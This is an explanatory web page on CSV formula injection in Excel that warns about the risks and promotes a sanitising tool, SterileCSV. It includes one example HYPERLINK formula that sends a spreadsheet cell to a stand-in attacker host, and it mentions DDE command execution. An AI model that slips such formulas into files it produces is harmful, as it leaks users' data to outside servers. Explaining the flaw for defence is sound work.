CSV injection in Excel (Formula Injection)
Many users assume CSV files are just text and therefore safe. This is false. If a cell in a CSV file begins with a trigger character like =, +, -, or @, Excel will interpret the cell content as a formula when opened.
This vulnerability is known as CSV Injection or Formula Injection.
The Risks
- Data Exfiltration: A formula like
=HYPERLINK("http://attacker.com?data="&A1, "Click me")can send sensitive data from your spreadsheet to an external server. - Command Execution: Using Dynamic Data Exchange (DDE), attackers can sometimes execute commands on your computer (e.g., launching
cmd.exeor PowerShell). - Annoyance/DoS: Infinite loops or heavy calculations that crash Excel.
How to protect yourself
You should never open untrusted CSV files directly in Excel.
Manual Sanitization
Before opening, inspect the raw text. If you see fields starting with =, you can prepend a single quote (') to force Excel to treat it as text. However, doing this manually for large files is error-prone.
Neutralize Threats Automatically
SterileCSV doesn't rely on messy hacks like prepending apostrophes. It parses every cell and, if a trigger character is found, explicitly writes that cell using Excel's native Text data type (Shared String).
This tells Excel strictly: "Treat this as text, not a formula." The result is 100% safe to open, with no risk of code execution, while preserving your data exactly as it was.